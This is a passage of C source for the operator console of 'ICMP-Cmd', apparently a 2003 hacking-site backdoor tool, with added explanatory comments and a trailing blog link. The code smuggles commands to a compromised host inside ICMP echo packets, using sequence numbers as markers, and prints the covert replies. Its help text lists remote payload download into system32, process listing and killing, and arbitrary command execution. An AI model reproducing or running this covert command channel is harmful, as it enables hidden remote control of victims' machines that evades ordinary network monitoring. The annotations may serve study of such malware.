// decode_resp). The sequence field is the marker: 1234 is sent with commands, 4321 is expected in replies.
typedef struct _ihdr
{
	BYTE i_type;// 8-bit type
	BYTE i_code; // 8-bit code
	USHORT i_cksum;// 16-bit checksum
	USHORT i_id;// identifier (this tool stores its process id here)
	USHORT i_seq;// sequence number, repurposed as the command/reply marker
	ULONG timestamp;// timestamp (GetTickCount)
} IcmpHeader;
#define STATUS_FAILED 0xFFFF

#define MAX_PACKET 2000 // size of the send and receive buffers
char arg[1450]; // payload text copied out of a reply packet (decode_resp)
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))

void fill_icmp_data(char *, int); // build the request header (seq 1234) and copy SendMsg in
USHORT checksum(USHORT *, int); // Internet one's-complement checksum over the given bytes
void decode_resp(char *,int ,struct sockaddr_in *);// parse a reply packet and print its payload
void help(void); // print the command reference
void usage(char * prog); // print the banner and usage line
// Operator-side console: reads one line at a time, sends it to argv[1] inside an ICMP packet marked
// with sequence 1234, then prints every reply marked 4321 that arrives within about one second.
int main(int argc, char *argv[])
{
	char *ICMP_DEST_IP; // IP of the target host
	char *recvbuf;
	if(argc!=2)
	{
		usage(argv[0]);
		return 0;
	}
	ICMP_DEST_IP=argv[1];// target host IP from the command line
	WSADATA wsaData;
	SOCKET sockRaw;
	struct sockaddr_in dest,from;
	int datasize;
	int fromlen=sizeof(from);
	char *icmp_data;


	if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
	{
		fprintf(stderr, "WSAStartup failed: %d\n", GetLastError());
		ExitProcess(STATUS_FAILED);
	}
	sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); // return value is not checked
	int timeout=1000;
	setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout));
	timeout=4000;
	setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout));
	memset(&dest,0,sizeof(dest));
	dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);
	dest.sin_family=AF_INET;
	usage(argv[0]);
	__try{
		for(;;){
			printf("ICMP-CMD>");
			// SendMsg is 256 bytes but fgets is allowed 1024: a long input line overruns it.
			fgets(SendMsg,1024,stdin);// read the command line into SendMsg
			if(!strcmp(SendMsg,"Q\n")||!strcmp(SendMsg,"q\n"))ExitProcess(0);
			if(!strcmp(SendMsg,"\n"))continue;
			if(!strcmp(SendMsg,"H\n")||!strcmp(SendMsg,"h\n")){help();continue;}
			// Only the inner `if` is guarded by the "http://" test; the indented statements that follow
			// run for every command (the indentation is misleading, the behaviour is as intended).
			if(!memcmp(SendMsg,"http://",7))
				if(!strstr(SendMsg,"-")){
					printf("\nFileName Error. Use ");
					continue;
				}
				datasize=strlen(SendMsg);
				datasize+=sizeof(IcmpHeader);
				printf("ICMP packet size is %d",datasize);
				// Two HeapAlloc calls per command, never freed.
				icmp_data= (char*)xmalloc(MAX_PACKET);
				recvbuf= (char *)xmalloc(MAX_PACKET);
				memset(icmp_data,0, MAX_PACKET);
				fill_icmp_data(icmp_data, datasize);
				((IcmpHeader *)icmp_data)->i_cksum=0;
				((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize);
				int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));
				if (bwrote == SOCKET_ERROR)
				{
					if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
					fprintf(stderr,"sendto failed: %d\n",WSAGetLastError());
				}
				if (bwrote<datasize ) {// a short send (or SOCKET_ERROR, which is negative) ends the program
					return 0;
				}
				printf("\nSend Packet to %s Success!\n",argv[1]);
				DWORD start = GetTickCount();
				// Collect replies for ~1 s; each recvfrom may itself block up to the 4 s receive timeout.
				for(;;){
					if((GetTickCount() - start) >= 1000) break;
					memset(recvbuf,0,MAX_PACKET);
					int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen);
					if(bread == SOCKET_ERROR)
					{
						if(WSAGetLastError() == WSAETIMEDOUT)
						{
							printf("timed out\n");
							break;
						}
						fprintf(stderr, "recvfrom failed: %d\n", WSAGetLastError());
						break;
					}
					decode_resp(recvbuf, bread, &from);
				}
		}//end for
	}//end try


	__finally
	{
		if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
		WSACleanup();
	}
	return 0;
}

/*
 * Internet one's-complement checksum (RFC 1071) of `size` bytes starting at `buffer`:
 * sum the 16-bit words, add any odd trailing byte, fold the carries into 16 bits, complement.
 */
USHORT checksum(USHORT *buffer, int size)
{
	unsigned long total = 0;
	int left = size;

	while (left > 1) {
		total += *buffer++;
		left -= 2;
	}
	/* anything not covered by a full word (one byte, or a negative size as in the original) */
	if (left != 0) {
		total += *(UCHAR *)buffer;
	}
	/* carry folding */
	unsigned long folded = (total & 0xffff) + (total >> 16);
	folded += folded >> 16;
	return (USHORT)(~folded);
}
// Builds the request in icmp_data: type 0 / code 0 header, own process id, current tick count and the
// sequence value 1234 (the server's ICMP_PASSWORD), followed by the whole SendMsg array.
// `datasize` is unused: all 256 bytes of SendMsg are copied, while the caller checksums and sends only
// strlen(SendMsg) + header bytes. i_cksum is left as-is here and zeroed/filled by the caller.
void fill_icmp_data(char *icmp_data, int datasize)
{
	IcmpHeader *icmp_hdr;
	char *datapart;
	icmp_hdr= (IcmpHeader *)icmp_data;
	icmp_hdr->i_type=0;
	icmp_hdr->i_code=0;
	icmp_hdr->i_id=(USHORT)GetCurrentProcessId();
	icmp_hdr->timestamp =GetTickCount();
	icmp_hdr->i_seq=1234; // command marker expected by the server
	datapart=icmp_data + sizeof(IcmpHeader);
	memcpy(datapart,SendMsg,sizeof(SendMsg));
}
/* Print the banner, the one-line usage (prog is the program name) and the key hints. */
void usage(char * prog)
{
	static const char *const banner[] = {
		"\t\t=====Welcome to www.hackerxfiles.net======\n",
		"\n",
		"\t\t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---\n",
		"\t\t---[ E-mail:    gxisone@hotmail.com   ]---\n",
		"\t\t---[                      2003/8/15   ]---\n",
	};
	for (size_t i = 0; i < sizeof banner / sizeof banner[0]; i++) {
		fputs(banner[i], stdout);
	}
	printf("\t\tusage: %s RemoteIP\n", prog);
	fputs("\t\tCtrl+C or Q/q to Quite        H/h for help\n", stdout);
}


// Prints one received packet if it is a reply from the server (ICMP sequence 4321): sender, type,
// code, then the payload that follows the 12-byte ICMP header. Other ICMP packets are reported as such.
void decode_resp(char *buf, int bytes,struct sockaddr_in *from) 
{
	memset(arg,0,sizeof(arg)); // arg is a real array here, so the whole 1450 bytes are cleared
	IpHeader *iphdr;
	IcmpHeader *icmphdr;
	unsigned short iphdrlen;
	iphdr = (IpHeader *)buf;
	iphdrlen = iphdr->h_len * 4 ; // IP header length is in 32-bit words
	icmphdr = (IcmpHeader*)(buf + iphdrlen);
	if(icmphdr->i_seq==4321)// reply marker set by the server; only then is the payload shown
	{
		printf("%d bytes from %s:",bytes, inet_ntoa(from->sin_addr));
		printf(" IcmpType %d",icmphdr->i_type);
		printf(" IcmpCode %d",icmphdr->i_code);
		printf("\n");
		// Copies 1450 bytes regardless of `bytes` (stays inside the 2000-byte receive buffer, since
		// iphdrlen is at most 60). If the payload has no NUL within 1450 bytes, arg is left
		// unterminated and the printf below reads past it.
		memcpy(arg,buf+iphdrlen+12,1450);
		printf("%s",arg);
	}
	else 
		printf("Other ICMP Packets!\n");
}
/* Print the operator command reference, one command per line. */
void help(void)
{
	static const char *const lines[] = {
		"\n",
		"[http://127.0.0.1/hack.exe -admin.exe]  (Download Files. Parth is system32)\n",
		"[pslist]        (List the Process)\n",
		"[pskill ID]     (Kill the Process)\n",
		"Command         (run the command)\n",
		"\n",
	};
	size_t count = sizeof lines / sizeof lines[0];
	for (size_t i = 0; i < count; i++) {
		fputs(lines[i], stdout);
	}
}

http://blog.csdn.net/itcastcpp/article/details/4034302
